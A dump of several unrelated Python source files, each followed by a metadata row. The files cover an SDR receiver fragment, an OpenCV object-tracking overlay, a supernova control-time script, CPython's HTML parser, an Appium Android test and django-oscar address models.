self.run_correct_ffe_thread = True
self.ffe_updater = threading.Timer(0.1, self.correct_ffe)
self.ffe_updater.setDaemon(True)
self.ffe_updater.start()
def correct_ffe(self):
while self.run_correct_ffe_thread:
diff = self.demod.sync.ffs_sample_and_average_arg.ffe_estimate()
if abs(diff) > self.rx_params.usrp_ffc_min_deviation:
self.frequency -= diff*self.rx_params.usrp_ffc_adapt_factor
print "--> updating fine frequency correction: " + str(self.frequency)
self.set_freq(self.frequency)
time.sleep(1./self.rx_params.usrp_ffc_retune_frequency)
def set_freq(self, freq):
if self.src.set_center_freq(freq):
if self.verbose:
print "--> retuned to " + str(freq) + " Hz"
return True
else:
print "-> error - cannot tune to " + str(freq) + " Hz"
return False
if __name__ == '__main__':
app = stdgui2.stdapp(usrp_dab_gui_rx, "usrp_dab_gui_rx", nstatus=1)
app.MainLoop()
| gpl-3.0 | 8,074,108,952,524,165,000 | 38.54321 | 346 | 0.685295 | false |
reliableJARED/python | opencv/video_on_video_overlay_tracked_obj.py | 1 | 4338 | '''
This code will put a video on a colored object (like a green ball)in the main
video stream. It will resize the overlay video on the fly
based on big the tracked object is. The code will not work without
the file: hist_for_tracking.png
that is the 'color calibration' image. The program does allow you
to calibrate to any color. press 'x' while an image is in the
green box shown on the screen and it will recalibrate to
that and update the 'hist_for_tracking.png' . You also need something to overlay. replace
'video1.mp4' with what ever video or image you want to overlay on the tracked object.
I can show you how to use this program if you're
looking for this type of application. Its just a basic demo
'''
#need sys import to use any no python env files like common.py
import sys
sys.path.append('/home/jared/PythonWork/opencv')
import cv2 #NOTE: this is from OpenCV
import numpy as np
#get video frame
frame = cv2.VideoCapture(0)
def read_overlay():
vid = cv2.VideoCapture('video1.mp4')
return vid
while (True):
#get pic to be used as tracking histogram
roi = cv2.imread('hist_for_tracking.png')
search_hsv = cv2.cvtColor(roi,cv2.COLOR_BGR2HSV)
#get next video frame
check, img = frame.read()
#this try/except if is used to start the overlay video, and keep looping it
try:
check2, track_img = vid.read()
except:
vid = read_overlay()
check2, track_img = vid.read()
if check2 == False:
vid = read_overlay()
check2, track_img = vid.read()
#when check2 == False, the vid is over.
find_hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#calculate histogram of color to look for
#calcHist([image],[channel],mask,[histogram bin count(256 full)],range(256 full))
roihist = cv2.calcHist([search_hsv],[0,1], None, [50,256], [0,180,0,256] )
#ORIGINAL:
#roihist = cv2.calcHist([search_hsv],[0,1], None, [180,256], [0,180,0,256] )
# normalize histogram and apply backprojection
cv2.normalize(roihist,roihist,0,255,cv2.NORM_MINMAX)
dst = cv2.calcBackProject([find_hsv],[0,1],roihist,[0,180,0,256],1)
# Now convolute with circular disc
#--not sure what that means
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5,5))
cv2.filter2D(dst,-1,disc,dst)
#Find all the blobs that match tracked color
#using dst as input will be looking for black and white as dst has no color
contours, hier = cv2.findContours(dst,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
#determine which contour is the largest
big_area = 0
for shape in contours:
check = cv2.contourArea(shape)
if check > big_area:
#set new biggest area
big_area = cv2.contourArea(shape)
#identify largest shape so that x,y is known
big_shape = shape
if big_shape.any():
if 10<cv2.contourArea(big_shape):
#determine shape of a rectangle that would enclose the obj
(x,y,w,h) = cv2.boundingRect(big_shape)
#read image to be displayed
if check2==True:
pic = track_img
#resize image based on boundingRect() coordinates
new_dimensions = (int(w),int(h))
new_pic = cv2.resize(pic,new_dimensions,interpolation=cv2.INTER_AREA)
img[y:y+h,x:x+w]=new_pic
if check2 == False:
vid.release()
# threshold and binary AND
ret,thresh = cv2.threshold(dst,50,255,0)
thresh = cv2.merge((thresh,thresh,thresh))
resb = cv2.bitwise_and(img, thresh)
cv2.imshow('color_select',resb)
#put rectangle on screen where screen shot will grab from
cv2.rectangle(img,(250,200),(350,300),(0,255,0),2)
cv2.imshow('live',img)
ScreenShot = cv2.waitKey(25)& 0xFF
if ScreenShot == ord('x'):
#if 'x' is pressed
#displays a screen shot of image in rectangle
#saves it for use in histogram[y:y,x:x]
cv2.imshow('Color2Track',img[200:300,250:350])
cv2.imwrite('hist_for_tracking.png',img[200:300,250:350])
if cv2.waitKey(25) &0xFF== ord('q'):
#when everything done, release the capture
frame.release()
cv2.destroyAllWindows()
break
| gpl-3.0 | -4,845,308,143,406,473,000 | 35.453782 | 90 | 0.638774 | false |
cosmodesi/snsurvey | src/control.py | 1 | 1120 | #!/usr/bin/env python
import numpy
import sncosmo
import scipy.optimize
import matplotlib.pyplot as plt
model=sncosmo.Model(source='salt2-extended')
def f(t ,rlim):
# print t, model.bandflux('desr',t, zp = rlim, zpsys='ab')
return model.bandflux('desr',t, zp = rlim, zpsys='ab')-1.
def controlTime(z,rlim):
model.set(z=z, t0=55000.)
model.set_source_peakabsmag(absmag=-19.3,band='bessellb',magsys='ab')
pre = scipy.optimize.fsolve(f, 55000.-15*(1+z) ,args=(rlim),xtol=1e-8)
post = scipy.optimize.fsolve(f, 55000.+20*(1+z) ,args=(rlim),xtol=1e-8)
return max(post[0]-pre[0],0)
# print scipy.optimize.fsolve(f, 55000.+40,args=(rlim),factor=1.,xtol=1e-8)
def plot():
lmag = numpy.arange(19.5,21.6,0.5)
zs = numpy.arange(0.02, 0.2501,0.02)
ans = []
for lm in lmag:
ans_=[]
for z in zs:
ans_.append(controlTime(z,lm))
ans.append(ans_)
for lm, ct in zip(lmag, ans):
plt.plot(zs, ct, label = '$r_{{lim}} = {}$'.format(str(lm)))
plt.xlabel(r'$z$')
plt.ylabel(r'control time (days)')
plt.legend()
plt.show()
| bsd-3-clause | -1,581,675,154,253,889,500 | 26.317073 | 79 | 0.605357 | false |
prefetchnta/questlab | bin/x64bin/python/37/Lib/html/parser.py | 1 | 18191 | """A parser for HTML and XHTML."""
# This file is based on sgmllib.py, but the API is slightly different.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special).
import re
import warnings
import _markupbase
from html import unescape
__all__ = ['HTMLParser']
# Regular expressions used for parsing
interesting_normal = re.compile('[&<]')
incomplete = re.compile('&[a-zA-Z#]')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
charref = re.compile('&#(?:[0-9]+|[xX][0-9a-fA-F]+)[^0-9a-fA-F]')
starttagopen = re.compile('<[a-zA-Z]')
piclose = re.compile('>')
commentclose = re.compile(r'--\s*>')
# Note:
# 1) if you change tagfind/attrfind remember to update locatestarttagend too;
# 2) if you change tagfind/attrfind and/or locatestarttagend the parser will
# explode, so don't do it.
# see http://www.w3.org/TR/html5/tokenization.html#tag-open-state
# and http://www.w3.org/TR/html5/tokenization.html#tag-name-state
tagfind_tolerant = re.compile(r'([a-zA-Z][^\t\n\r\f />\x00]*)(?:\s|/(?!>))*')
attrfind_tolerant = re.compile(
r'((?<=[\'"\s/])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?(?:\s|/(?!>))*')
locatestarttagend_tolerant = re.compile(r"""
<[a-zA-Z][^\t\n\r\f />\x00]* # tag name
(?:[\s/]* # optional whitespace before attribute name
(?:(?<=['"\s/])[^\s/>][^\s/=>]* # attribute name
(?:\s*=+\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|"[^"]*" # LIT-enclosed value
|(?!['"])[^>\s]* # bare value
)
(?:\s*,)* # possibly followed by a comma
)?(?:\s|/(?!>))*
)*
)?
\s* # trailing whitespace
""", re.VERBOSE)
endendtag = re.compile('>')
# the HTML 5 spec, section 8.1.2.2, doesn't allow spaces between
# </ and the tag name, so maybe this should be fixed
endtagfind = re.compile(r'</\s*([a-zA-Z][-.a-zA-Z0-9:_]*)\s*>')
class HTMLParser(_markupbase.ParserBase):
"""Find tags and other markup and call handler functions.
Usage:
p = HTMLParser()
p.feed(data)
...
p.close()
Start tags are handled by calling self.handle_starttag() or
self.handle_startendtag(); end tags by self.handle_endtag(). The
data between tags is passed from the parser to the derived class
by calling self.handle_data() with the data as argument (the data
may be split up in arbitrary chunks). If convert_charrefs is
True the character references are converted automatically to the
corresponding Unicode character (and self.handle_data() is no
longer split in chunks), otherwise they are passed by calling
self.handle_entityref() or self.handle_charref() with the string
containing respectively the named or numeric reference as the
argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, *, convert_charrefs=True):
"""Initialize and reset this instance.
If convert_charrefs is True (the default), all character references
are automatically converted to the corresponding Unicode characters.
"""
self.convert_charrefs = convert_charrefs
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.convert_charrefs and not self.cdata_elem:
j = rawdata.find('<', i)
if j < 0:
# if we can't find the next <, either we are at the end
# or there's more text incoming. If the latter is True,
# we can't pass the text to handle_data in case we have
# a charref cut in half at end. Try to determine if
# this is the case before proceeding by looking for an
# & near the end and see if it's followed by a space or ;.
amppos = rawdata.rfind('&', max(i, n-34))
if (amppos >= 0 and
not re.compile(r'[\s;]').search(rawdata, amppos)):
break # wait till we get all the text
j = n
else:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:j]))
else:
self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:k]))
else:
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: # bail by consuming &#
self.handle_data(rawdata[i:i+2])
i = self.updatepos(i, i+2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:n]))
else:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind_tolerant.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group(1).lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
# </tag attr=">">, but looking for > after tha name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem)
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
pass
# Internal -- helper to remove special character quoting
def unescape(self, s):
warnings.warn('The unescape method is deprecated and will be removed '
'in 3.5, use html.unescape() instead.',
DeprecationWarning, stacklevel=2)
return unescape(s)
| lgpl-2.1 | -4,034,221,794,916,283,000 | 36.704255 | 80 | 0.490792 | false |
spedepekka/testdroid-samples | appium/sample-scripts/python/testdroid_android_hybrid.py | 1 | 9582 | ##
## For help on setting up your machine and configuring this TestScript go to
## http://docs.testdroid.com/appium/
##
import os
import time
import unittest
import subprocess
from time import sleep
from appium import webdriver
from device_finder import DeviceFinder
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import NoSuchElementException
from appium.common.exceptions import NoSuchContextException
def log(msg):
print (time.strftime("%H:%M:%S") + ": " + msg)
class TestdroidAndroid(unittest.TestCase):
"""
Take screenshot and store files to defined location, with numbering prefix
:Args:
- name - files are stored as #_name
"""
def screenshot(self, name):
screenshot_name = str(self.screenshot_count) + "_" + name + ".png"
log("Taking screenshot: " + screenshot_name)
# on Android, switching context to NATIVE_APP for screenshot
# taking to get screenshots also stored to Testdroid Cloud
# device run view. After screenshot switching back to WEBVIEW.
if not "NATIVE_APP" in self.driver.current_context:
self.driver.switch_to.context("NATIVE_APP")
self.driver.save_screenshot(self.screenshot_dir + "/" + screenshot_name)
contexts = self.driver.contexts
self.driver.switch_to.context(self.driver.contexts[-1])
else:
self.driver.save_screenshot(self.screenshot_dir + "/" + screenshot_name)
self.screenshot_count += 1
"""
Search for specified xpath for defined period
:Args:
- xpath - the xpath to search for
- timeout - duration in seconds to search for given xpath
- step - how often to search run the search
:Usage:
self.wait_until_xpath_matches("//div[@id='example']", 15, 2)"
"""
def wait_until_xpath_matches(self, xpath, timeout=10, step=1):
end_time = time.time() + timeout
found = False
while (time.time() < end_time and not found):
log(" Looking for xpath {}".format(xpath))
try:
element = self.driver.find_element_by_xpath(xpath)
found = True
except NoSuchElementException:
found = False
time.sleep(step)
if not found:
raise NoSuchElementException("Element wiht xpath: '{}' not found in {}s".format(xpath, timeout))
return element
def setUp(self):
##
## IMPORTANT: Set the following parameters.
## You can set the parameters outside the script with environment variables.
## If env var is not set the string after or is used.
##
testdroid_url = os.environ.get('TESTDROID_URL') or "https://cloud.testdroid.com"
appium_url = os.environ.get('TESTDROID_APPIUM_URL') or 'http://appium.testdroid.com/wd/hub'
testdroid_apiKey = os.environ.get('TESTDROID_APIKEY') or ""
testdroid_project = os.environ.get('TESTDROID_PROJECT') or 'Android hybrid sample project'
testdroid_testrun = os.environ.get('TESTDROID_TESTRUN') or 'My testrun'
testdroid_app = os.environ.get('TESTDROID_APP') or ""
app_package = os.environ.get('TESTDROID_APP_PACKAGE') or 'com.testdroid.sample.android'
app_activity = os.environ.get('TESTDROID_ACTIVITY') or '.MM_MainMenu'
new_command_timeout = os.environ.get('TESTDROID_CMD_TIMEOUT') or '60'
testdroid_test_timeout = os.environ.get('TESTDROID_TEST_TIMEOUT') or '600'
self.screenshot_dir = os.environ.get('TESTDROID_SCREENSHOTS') or os.getcwd() + "/screenshots"
log ("Will save screenshots at: " + self.screenshot_dir)
self.screenshot_count = 1
# Options to select device
# 1) Set environment variable TESTDROID_DEVICE
# 2) Set device name to this python script
# 3) Do not set #1 and #2 and let DeviceFinder to find free device for you
testdroid_device = os.environ.get('TESTDROID_DEVICE') or ""
deviceFinder = DeviceFinder(url=testdroid_url)
if testdroid_device == "":
# Loop will not exit until free device is found
while testdroid_device == "":
testdroid_device = deviceFinder.available_android_device()
if "localhost" in appium_url:
self.api_level = subprocess.check_output(["adb", "shell", "getprop ro.build.version.sdk"])
else:
self.api_level = deviceFinder.device_API_level(testdroid_device)
log("Device API level is %s" % self.api_level)
log("Starting Appium test using device '%s'" % testdroid_device)
desired_capabilities_cloud = {}
desired_capabilities_cloud['testdroid_apiKey'] = testdroid_apiKey
if self.api_level > 16:
desired_capabilities_cloud['testdroid_target'] = 'android'
desired_capabilities_cloud['automationName'] = 'android'
else:
desired_capabilities_cloud['testdroid_target'] = 'selendroid'
desired_capabilities_cloud['automationName'] = 'selendroid'
desired_capabilities_cloud['testdroid_apiKey'] = testdroid_apiKey
desired_capabilities_cloud['testdroid_project'] = testdroid_project
desired_capabilities_cloud['testdroid_testrun'] = testdroid_testrun
desired_capabilities_cloud['testdroid_device'] = testdroid_device
desired_capabilities_cloud['testdroid_app'] = testdroid_app
desired_capabilities_cloud['appPackage'] = app_package
desired_capabilities_cloud['appActivity'] = app_activity
desired_capabilities_cloud['platformName'] = 'Android'
desired_capabilities_cloud['deviceName'] = 'Android Phone'
desired_capabilities_cloud['newCommandTimeout'] = new_command_timeout
desired_capabilities_cloud['testdroid_testTimeout'] = testdroid_test_timeout
# set up webdriver
log ("WebDriver request initiated. Waiting for response, this typically takes 2-3 mins")
self.driver = webdriver.Remote(appium_url, desired_capabilities_cloud)
log ("WebDriver response received")
def tearDown(self):
log ("Quitting")
self.driver.quit()
def testSample(self):
log (" Getting device screen size")
log (" " + str(self.driver.get_window_size()))
isSelendroid = None
if self.api_level < 17:
isSelendroid = True
self.screenshot("app_launch")
log ("Checking API level. This test works only on API 19 and above.")
log ("API level: " + str(self.api_level))
if self.api_level < 19:
raise Exception("The chosen device has API level under 19. The Hybrid view will crash.")
log ('Clicking button "hybrid app"')
element = self.driver.find_element_by_id('com.testdroid.sample.android:id/mm_b_hybrid')
element.click()
self.screenshot('hybrid_activity')
log('Typing in the url http://docs.testdroid.com')
element=self.driver.find_element_by_id('com.testdroid.sample.android:id/hy_et_url')
element.send_keys("http://docs.testdroid.com")
self.screenshot('url_typed')
try:
log ("Hiding keyboard")
self.driver.hide_keyboard()
except WebDriverException:
pass # pass exception, if keyboard isn't visible already
self.screenshot('keyboard_hidden')
log('Clicking Load url button')
element = self.driver.find_element_by_id('com.testdroid.sample.android:id/hy_ib_loadUrl')
element.click()
self.screenshot('webpage_loaded')
contexts = "undefined"
end_time = time.time() + 30
while "undefined" in str(contexts) and time.time() < end_time:
contexts = self.driver.contexts
log(str(contexts))
sleep(5)
context = str(contexts[-1])
log ("Context will be " + context)
self.driver.switch_to.context(context)
log ("Context is " + self.driver.current_context)
log("Finding 'search button'")
end_time = time.time() + 30
element = None
while not element and time.time() < end_time:
# wait up to 10s to get search results
element = self.wait_until_xpath_matches('//input[@id="search"]', 10)
log("Clicking search field")
element.send_keys("appium")
self.screenshot("search_text")
log("Click search")
element = self.driver.find_element_by_xpath('//input[@class="search-button"]')
element.click()
log ("Look for result text heading")
# workaround, since h1 doesn't include all the text in one text() element
end_time = time.time() + 30
while time.time() < end_time:
# wait up to 10s to get search results
element = self.wait_until_xpath_matches('//h1[contains(text(), "Search results")]', 10)
if "appium" in element.text:
end_time = time.time()
self.screenshot("search_title_present")
log ("Verify correct heading text")
log ("h1 text: " + str(element.text))
self.assertTrue("Search results for \"appium\"" in str(element.text))
self.driver.switch_to.context("NATIVE_APP")
log('Going back')
self.driver.back()
self.screenshot('launch_screen')
def initialize():
return TestdroidAndroid
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TestdroidAndroid)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 | 8,970,575,629,305,151,000 | 39.09205 | 108 | 0.635775 | false |
aykut/django-oscar | oscar/apps/address/abstract_models.py | 1 | 7907 | import zlib
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractAddress(models.Model):
"""
Superclass address object
This is subclassed and extended to provide models for
user, shipping and billing addresses.
The only required fields are last_name, line1 and postcode.
"""
# @todo: Need a way of making these choice lists configurable
# per project
MR, MISS, MRS, MS, DR = ('Mr', 'Miss', 'Mrs', 'Ms', 'Dr')
TITLE_CHOICES = (
(MR, _("Mr")),
(MISS, _("Miss")),
(MRS, _("Mrs")),
(MS, _("Ms")),
(DR, _("Dr")),
)
title = models.CharField(_("Title"), max_length=64, choices=TITLE_CHOICES, blank=True)
first_name = models.CharField(_("First name"), max_length=255, blank=True)
last_name = models.CharField(_("Last name"), max_length=255)
# We use quite a few lines of an address as they are often quite long and
# it's easier to just hide the unnecessary ones than add extra ones.
line1 = models.CharField(_("First line of address"), max_length=255)
line2 = models.CharField(_("Second line of address"), max_length=255, blank=True)
line3 = models.CharField(_("Third line of address"), max_length=255, blank=True)
line4 = models.CharField(_("City"), max_length=255, blank=True)
state = models.CharField(_("State/County"), max_length=255, blank=True)
postcode = models.CharField(_("Post/Zip-code"), max_length=64)
country = models.ForeignKey('address.Country')
# A field only used for searching addresses - this contains all the relevant fields
search_text = models.CharField(_("Search text"), max_length=1000)
class Meta:
abstract = True
def save(self, *args, **kwargs):
self._clean_fields()
self._update_search_text()
super(AbstractAddress, self).save(*args, **kwargs)
def _clean_fields(self):
"""
Clean up fields
"""
self.first_name = self.first_name.strip()
for field in ['first_name', 'last_name', 'line1', 'line2', 'line3', 'line4', 'postcode']:
self.__dict__[field] = self.__dict__[field].strip()
# Ensure postcodes are always uppercase
if self.postcode:
self.postcode = self.postcode.upper()
def _update_search_text(self):
search_fields = filter(lambda x: x, [self.first_name, self.last_name,
self.line1, self.line2, self.line3, self.line4, self.state,
self.postcode, self.country.name])
self.search_text = ' '.join(search_fields)
@property
def summary(self):
"""
Returns a single string summary of the address,
separating fields using commas.
"""
return u", ".join(self.active_address_fields())
def populate_alternative_model(self, address_model):
"""
For populating an address model using the matching fields
from this one.
This is used to convert a user address to a shipping address
as part of the checkout process.
"""
destination_field_names = [field.name for field in address_model._meta.fields]
for field_name in [field.name for field in self._meta.fields]:
if field_name in destination_field_names and field_name != 'id':
setattr(address_model, field_name, getattr(self, field_name))
def active_address_fields(self):
u"""
Returns the non-empty components of the address, but merging the
title, first_name and last_name into a single line.
"""
self._clean_fields()
fields = filter(lambda x: x, [self.salutation(), self.line1, self.line2, self.line3,
self.line4, self.postcode])
if self.country:
fields.append(self.country.name)
return fields
def salutation(self):
u"""Returns the salutation"""
return u" ".join([part for part in [self.title, self.first_name, self.last_name] if part])
def name(self):
"""
Returns the full name
"""
return u" ".join([part for part in [self.first_name, self.last_name] if part])
def __unicode__(self):
return self.summary
class AbstractCountry(models.Model):
"""
International Organization for Standardization (ISO) 3166-1 Country list.
"""
iso_3166_1_a2 = models.CharField(_('ISO 3166-1 alpha-2'), max_length=2, primary_key=True)
iso_3166_1_a3 = models.CharField(_('ISO 3166-1 alpha-3'), max_length=3, null=True, db_index=True)
iso_3166_1_numeric = models.PositiveSmallIntegerField(_('ISO 3166-1 numeric'), null=True, db_index=True)
name = models.CharField(_('Official name (CAPS)'), max_length=128)
printable_name = models.CharField(_('Country name'), max_length=128)
is_highlighted = models.BooleanField(default=False, db_index=True)
is_shipping_country = models.BooleanField(default=False, db_index=True)
class Meta:
abstract = True
verbose_name = _('Country')
verbose_name_plural = _('Countries')
ordering = ('-is_highlighted', 'name',)
def __unicode__(self):
return self.printable_name
class AbstractShippingAddress(AbstractAddress):
u"""
Shipping address.
A shipping address should not be edited once the order has been placed -
it should be read-only after that.
"""
phone_number = models.CharField(max_length=32, blank=True, null=True)
notes = models.TextField(blank=True, null=True, help_text="""Shipping notes""")
class Meta:
abstract = True
verbose_name_plural = "shipping addresses"
class AbstractUserAddress(AbstractShippingAddress):
"""
A user address which forms an "AddressBook" for a user.
We use a separate model to shipping and billing (even though there will be
some data duplication) because we don't want shipping/billing addresses changed
or deleted once an order has been placed. By having a separate model, we allow
users the ability to add/edit/delete from their address book without affecting
orders already placed.
"""
user = models.ForeignKey('auth.User', related_name='addresses')
# Customers can set defaults
is_default_for_shipping = models.BooleanField(default=False)
is_default_for_billing = models.BooleanField(default=False)
# We keep track of the number of times an address has been used
# as a shipping address so we can show the most popular ones
# first at the checkout.
num_orders = models.PositiveIntegerField(default=0)
# A hash is kept to try and avoid duplicate addresses being added
# to the address book.
hash = models.CharField(max_length=255, db_index=True)
date_created = models.DateTimeField(auto_now_add=True)
def generate_hash(self):
u"""Returns a hash of the address summary."""
# We use an upper-case version of the summary
return zlib.crc32(self.summary.strip().upper().encode('UTF8'))
def save(self, *args, **kwargs):
u"""Save a hash of the address fields"""
# Save a hash of the address fields so we can check whether two
# addresses are the same to avoid saving duplicates
self.hash = self.generate_hash()
super(AbstractUserAddress, self).save(*args, **kwargs)
class Meta:
abstract = True
verbose_name_plural = "User addresses"
ordering = ['-num_orders']
class AbstractBillingAddress(AbstractAddress):
class Meta:
abstract = True
verbose_name_plural = "Billing addresses"
